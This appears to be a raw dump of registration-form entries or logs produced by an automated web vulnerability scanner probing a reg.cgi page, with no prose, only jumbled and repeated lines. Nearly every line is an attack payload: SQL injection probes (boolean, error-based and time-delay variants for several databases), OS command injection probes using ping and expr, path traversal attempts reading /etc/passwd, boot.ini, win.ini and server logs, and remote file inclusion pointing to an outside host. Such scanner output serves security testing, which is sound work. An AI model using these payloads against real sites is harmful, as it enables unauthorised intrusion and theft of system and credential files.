Smith 3 /../../../../../../../../../../proc/version
/../../../../../../../../../../proc/version.cgi
Smith 3 /../../../../../../../../../../proc/version.cgi
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
file:///etc/passwd
Smith 3 file:///etc/passwd
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/../../../../../../../../../../../etc/passwd.cgi
Smith 3 /../../../../../../../../../../../etc/passwd.cgi
Smith 3 http://r87.com/?
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Smith 3 %2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
ns../../../../../../../../../../boot.ini........................................................................................................................................................
Smith 3 ns../../../../../../../../../../boot.ini........................................................................................................................................................
/../../../../../../../../../../../etc/passwd
Smith 3 /../../../../../../../../../../../etc/passwd
/etc/passwd
Smith 3 /etc/passwd
reg.cgi
Smith 3 reg.cgi
reg.cgi
Smith 3 reg.cgi
data:;base64,TlM3NzU0NTYxNDQ2NTc1
Smith 3 data:;base64,TlM3NzU0NTYxNDQ2NTc1
/Events/DiVA-July2004/reg.cgi
Smith 3 /Events/DiVA-July2004/reg.cgi
/DiVA-July2004/reg.cgi
r87.com/?
Smith 3 /DiVA-July2004/reg.cgi
file%3a%2fboot.ini
Smith 3 r87.com/?
Smith 3 file%3a%2fboot.ini
/\r87.com/?
c%3a%5cboot.ini
Smith 3 /\r87.com/?
Smith 3 c%3a%5cboot.ini
///r87.com/?
Smith 3 ///r87.com/?
Smith 3
Smith 3 netsparker@example.com
dovtjz RRWONgPWNnZ ojtwpi@tsohnq.com
Mark lgxUgdVgsm mark3qf527@hotmail.com
Smith 3 netsparker@example.com
%27
-1 OR 1=1 3 netsparker@example.com
%27 3 netsparker@example.com
-1 OR 1=1 3 netsparker@example.com
' WAITFOR DELAY '0:0:25'--
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
'"-->
' 3 netsparker@example.com
' WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) 3 netsparker@example.com
NS1NO 3 netsparker@example.com
1 WAITFOR DELAY '0:0:25'--
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
"& SET /A 0xFFF9999-2 &
1 AND 'NS='ss 3 netsparker@example.com
1 WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
"& SET /A 0xFFF9999-2 & 3 netsparker@example.com
' OR 'ns'='ns 3 netsparker@example.com
WAITFOR DELAY '0:0:25'--
'& SET /A 0xFFF9999-2 &
-1 OR 17-7=10 3 netsparker@example.com
WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'"--> 3 netsparker@example.com
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' 3 netsparker@example.com
'& SET /A 0xFFF9999-2 & 3 netsparker@example.com
1 OR X='ss 3 netsparker@example.com
1) WAITFOR DELAY '0:0:25'--
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
& SET /A 0xFFF9999-2 &
' OR '1'='1 3 netsparker@example.com
1) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) 3 netsparker@example.com
& SET /A 0xFFF9999-2 & 3 netsparker@example.com
' OR '1'='1 3 netsparker@example.com
') WAITFOR DELAY '0:0:25'--
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
'"-->
SET /A 0xFFF9999-2 &
-1 OR 1=1 3 netsparker@example.com
"& ping -n 25 127.0.0.1 &
') WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' 3 netsparker@example.com
SET /A 0xFFF9999-2 & 3 netsparker@example.com
-1 OR 1=1 3 netsparker@example.com
"& ping -n 25 127.0.0.1 & 3 netsparker@example.com
')) WAITFOR DELAY '0:0:25'--
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
"&expr 268409241 - 2 &"
' 3 netsparker@example.com
'& ping -n 25 127.0.0.1 &
')) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' 3 netsparker@example.com
"&expr 268409241 - 2 &" 3 netsparker@example.com
NS1NO 3 netsparker@example.com
'& ping -n 25 127.0.0.1 & 3 netsparker@example.com
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
Smith '"--> netsparker@example.com
1)) WAITFOR DELAY '0:0:25'--
'&expr 268409241 - 2 &'
1 AND 'NS='ss 3 netsparker@example.com
& ping -n 25 127.0.0.1 &
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) 3 netsparker@example.com
1)) WAITFOR DELAY '0:0:25'-- 3 netsparker@example.com
'&expr 268409241 - 2 &' 3 netsparker@example.com
' OR 'ns'='ns 3 netsparker@example.com
& ping -n 25 127.0.0.1 & 3 netsparker@example.com
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
&expr 268409241 - 2 &
-1 OR 17-7=10 3 netsparker@example.com
ping -n 25 127.0.0.1 &
'"-->
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
&expr 268409241 - 2 & 3 netsparker@example.com
1 OR X='ss 3 netsparker@example.com
ping -n 25 127.0.0.1 & 3 netsparker@example.com
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
expr 268409241 - 2 &
' OR '1'='1 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &"
1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" 3 netsparker@example.com
expr 268409241 - 2 & 3 netsparker@example.com
' OR '1'='1 3 netsparker@example.com
"&ping -c 25 127.0.0.1 &" 3 netsparker@example.com
Smith 3 '"-->
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
Smith -1 OR 1=1 netsparker@example.com
SET /A 0xFFF9999-2
'&ping -c 25 127.0.0.1 &'
1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
SET /A 0xFFF9999-2 3 netsparker@example.com
'&ping -c 25 127.0.0.1 &' 3 netsparker@example.com
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
Smith ' netsparker@example.com
expr 268409241 - 2
&ping -c 25 127.0.0.1 &
syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x-- 3 netsparker@example.com
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) 3 netsparker@example.com
Smith NS1NO netsparker@example.com
expr 268409241 - 2 3 netsparker@example.com
Smith 3 netsparker@example.com
&ping -c 25 127.0.0.1 & 3 netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1
Smith 1 AND 'NS='ss netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
268409239
ping -c 25 127.0.0.1 &
Smith ' OR 'ns'='ns netsparker@example.com
-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1 3 netsparker@example.com
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' 3 netsparker@example.com
268409239 3 netsparker@example.com
ping -c 25 127.0.0.1 & 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
((select sleep(25)))a-- 1
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
"& SET /A 0xFFF9999-2 &
ping -n 25 127.0.0.1
Smith 1 OR X='ss netsparker@example.com
((select sleep(25)))a-- 1 3 netsparker@example.com
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL) 3 netsparker@example.com
Smith "& SET /A 0xFFF9999-2 & netsparker@example.com
ping -n 25 127.0.0.1 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)
NSFTW
'& SET /A 0xFFF9999-2 &
ping -c 25 127.0.0.1
Smith ' OR '1'='1 netsparker@example.com
(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) 3 netsparker@example.com
NSFTW 3 netsparker@example.com
Smith '& SET /A 0xFFF9999-2 & netsparker@example.com
ping -c 25 127.0.0.1 3 netsparker@example.com
Smith 3 netsparker@example.com
Smith -1 OR 1=1 netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '
'+NSFTW+'
& SET /A 0xFFF9999-2 &
"& ping -n 25 127.0.0.1 &
/../../../../../../../../../../boot.ini
Smith -1 OR 1=1 netsparker@example.com
1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || ' 3 netsparker@example.com
'+NSFTW+' 3 netsparker@example.com
Smith & SET /A 0xFFF9999-2 & netsparker@example.com
Smith "& ping -n 25 127.0.0.1 & netsparker@example.com
/../../../../../../../../../../boot.ini 3 netsparker@example.com
Smith ' netsparker@example.com
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
SET /A 0xFFF9999-2 &
'& ping -n 25 127.0.0.1 &
Smith NS1NO netsparker@example.com
/../../../../../../../../../../web.config
1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1 3 netsparker@example.com
(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) 3 netsparker@example.com
Smith SET /A 0xFFF9999-2 & netsparker@example.com
Smith '& ping -n 25 127.0.0.1 & netsparker@example.com
Smith 1 AND 'NS='ss netsparker@example.com
/../../../../../../../../../../web.config 3 netsparker@example.com
';SELECT pg_sleep(25)--
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
"&expr 268409241 - 2 &"
Smith ' OR 'ns'='ns netsparker@example.com
& ping -n 25 127.0.0.1 &
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini
';SELECT pg_sleep(25)-- 3 netsparker@example.com
-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' 3 netsparker@example.com
Smith "&expr 268409241 - 2 &" netsparker@example.com
Smith -1 OR 17-7=10 netsparker@example.com
Smith & ping -n 25 127.0.0.1 & netsparker@example.com
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini 3 netsparker@example.com
1;SELECT pg_sleep(25)--
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1
'&expr 268409241 - 2 &'
Smith 1 OR X='ss netsparker@example.com
ping -n 25 127.0.0.1 &
/../../../../../../../../../../boot.ini.cgi
1;SELECT pg_sleep(25)-- 3 netsparker@example.com
-1\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1 3 netsparker@example.com
Smith '&expr 268409241 - 2 &' netsparker@example.com
Smith ' OR '1'='1 netsparker@example.com
Smith ping -n 25 127.0.0.1 & netsparker@example.com
/../../../../../../../../../../boot.ini.cgi 3 netsparker@example.com
SELECT pg_sleep(25)--
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1
&expr 268409241 - 2 &
Smith ' OR '1'='1 netsparker@example.com
"&ping -c 25 127.0.0.1 &"
/../../../../../../../../../../boot.ini
SELECT pg_sleep(25)-- 3 netsparker@example.com
1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1 3 netsparker@example.com
Smith 3 -1 OR 1=1
Smith &expr 268409241 - 2 & netsparker@example.com
Smith "&ping -c 25 127.0.0.1 &" netsparker@example.com
/../../../../../../../../../../boot.ini 3 netsparker@example.com
1);SELECT pg_sleep(25)--
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))
Smith 3 -1 OR 1=1
'&ping -c 25 127.0.0.1 &'
file:/windows/win.ini
expr 268409241 - 2 &
1);SELECT pg_sleep(25)-- 3 netsparker@example.com
(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)))) 3 netsparker@example.com
Smith 3 '
Smith '&ping -c 25 127.0.0.1 &' netsparker@example.com
file:/windows/win.ini 3 netsparker@example.com
Smith expr 268409241 - 2 & netsparker@example.com
');SELECT pg_sleep(25)--
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'
Smith 3 NS1NO
&ping -c 25 127.0.0.1 &
file:/boot.ini
SET /A 0xFFF9999-2
');SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 1 AND 'NS='ss
'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||' 3 netsparker@example.com
Smith &ping -c 25 127.0.0.1 & netsparker@example.com
file:/boot.ini 3 netsparker@example.com
Smith SET /A 0xFFF9999-2 netsparker@example.com
'));SELECT pg_sleep(25)--
Smith 3 ' OR 'ns'='ns
%27
ping -c 25 127.0.0.1 &
expr 268409241 - 2
/../../../../../../../../../../windows/win.ini
'));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith 3 -1 OR 17-7=10
Smith %27 netsparker@example.com
Smith ping -c 25 127.0.0.1 & netsparker@example.com
Smith expr 268409241 - 2 netsparker@example.com
/../../../../../../../../../../windows/win.ini 3 netsparker@example.com
Smith 3 1 OR X='ss
1));SELECT pg_sleep(25)--
(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)
ping -n 25 127.0.0.1
/../../../../../../../../../../windows/win.ini.cgi
268409239
Smith 3 ' OR '1'='1
1));SELECT pg_sleep(25)-- 3 netsparker@example.com
Smith (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) netsparker@example.com
Smith ping -n 25 127.0.0.1 netsparker@example.com
/../../../../../../../../../../windows/win.ini.cgi 3 netsparker@example.com
Smith 268409239 netsparker@example.com
Smith 3 ' OR '1'='1
((SELECT 1 FROM (SELECT SLEEP(25))A))
'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'
ping -c 25 127.0.0.1
c:\windows\win.ini
"& SET /A 0xFFF9999-2 &
Smith 3 -1 OR 1=1
((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith '+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +' netsparker@example.com
Smith ping -c 25 127.0.0.1 netsparker@example.com
c:\windows\win.ini 3 netsparker@example.com
Smith 3 "& SET /A 0xFFF9999-2 &
Smith 3 -1 OR 1=1
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'
convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))
"& ping -n 25 127.0.0.1 &
c:\boot.ini
Smith 3 '
'& SET /A 0xFFF9999-2 &
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
Smith convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) netsparker@example.com
Smith 3 "& ping -n 25 127.0.0.1 &
Smith 3 NS1NO
c:\boot.ini 3 netsparker@example.com
Smith 3 '& SET /A 0xFFF9999-2 &
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'
'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'
'& ping -n 25 127.0.0.1 &
Smith 3 1 AND 'NS='ss
/../../../../../../../../../../windows/iis6.log
& SET /A 0xFFF9999-2 &
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' 3 netsparker@example.com
Smith '+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+' netsparker@example.com
Smith 3 '& ping -n 25 127.0.0.1 &
Smith 3 ' OR 'ns'='ns
/../../../../../../../../../../windows/iis6.log 3 netsparker@example.com
Smith 3 & SET /A 0xFFF9999-2 &
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))
'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='
Smith 3 -1 OR 17-7=10
& ping -n 25 127.0.0.1 &
/../../../../../../../../../../proc/self/fd/2
SET /A 0xFFF9999-2 &
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) 3 netsparker@example.com
Smith 'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'=' netsparker@example.com
Smith 3 1 OR X='ss
Smith 3 & ping -n 25 127.0.0.1 &
/../../../../../../../../../../proc/self/fd/2 3 netsparker@example.com
Smith 3 SET /A 0xFFF9999-2 &
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"
-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)
ping -n 25 127.0.0.1 &
Smith 3 ' OR '1'='1
/../../../../../../../../../../proc/self/fd/2.cgi
"&expr 268409241 - 2 &"
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" 3 netsparker@example.com
Smith -1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a) netsparker@example.com
Smith 3 ping -n 25 127.0.0.1 &
Smith 3 ' OR '1'='1
/../../../../../../../../../../proc/self/fd/2.cgi 3 netsparker@example.com
Smith 3 "&expr 268409241 - 2 &"
-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'
' WAITFOR DELAY '0:0:25'--
"&ping -c 25 127.0.0.1 &"
hTTp://r87.com/n
/../../../../../../../../../../etc/httpd/logs/error.log
'&expr 268409241 - 2 &'
Smith -1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+' netsparker@example.com
Smith ' WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 "&ping -c 25 127.0.0.1 &"
hTTp://r87.com/n 3 netsparker@example.com
/../../../../../../../../../../etc/httpd/logs/error.log 3 netsparker@example.com
Smith 3 '&expr 268409241 - 2 &'
-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"
1 WAITFOR DELAY '0:0:25'--
'&ping -c 25 127.0.0.1 &'
http://r87.com/n?.cgi
/../../../../../../../../../../etc/httpd/logs/error_log
&expr 268409241 - 2 &
Smith -1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+" netsparker@example.com
Smith 1 WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 '&ping -c 25 127.0.0.1 &'
http://r87.com/n?.cgi 3 netsparker@example.com
/../../../../../../../../../../etc/httpd/logs/error_log 3 netsparker@example.com
Smith 3 &expr 268409241 - 2 &
(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))
WAITFOR DELAY '0:0:25'--
&ping -c 25 127.0.0.1 &
http://r87.com/n?.cgi
/../../../../../../../../../../var/log/apache2/error.log
expr 268409241 - 2 &
Smith (SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97))) netsparker@example.com
Smith WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 &ping -c 25 127.0.0.1 &
http://r87.com/n?.cgi 3 netsparker@example.com
/../../../../../../../../../../var/log/apache2/error.log 3 netsparker@example.com
Smith 3 expr 268409241 - 2 &
cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)
1) WAITFOR DELAY '0:0:25'--
ping -c 25 127.0.0.1 &
php://filter//resource=http://r87.com/n?.cgi
/../../../../../../../../../../var/log/apache/error.log
SET /A 0xFFF9999-2
Smith cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric) netsparker@example.com
Smith 1) WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 ping -c 25 127.0.0.1 &
php://filter//resource=http://r87.com/n?.cgi 3 netsparker@example.com
/../../../../../../../../../../var/log/apache/error.log 3 netsparker@example.com
Smith 3 SET /A 0xFFF9999-2
'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'
') WAITFOR DELAY '0:0:25'--
ping -n 25 127.0.0.1
r87.com/n
/../../../../../../../../../../proc/version
expr 268409241 - 2
Smith '||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||' netsparker@example.com
Smith ') WAITFOR DELAY '0:0:25'-- netsparker@example.com
Smith 3 ping -n 25 127.0.0.1
r87.com/n 3 netsparker@example.com
/../../../../../../../../../../proc/version 3 netsparker@example.com
Smith 3 expr 268409241 - 2
(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)
')) WAITFOR DELAY '0:0:25'--
ping -c 25 127.0.0.1
hTTp://r87.com/n
268409239
/../../../../../../../../../../proc/version.cgi
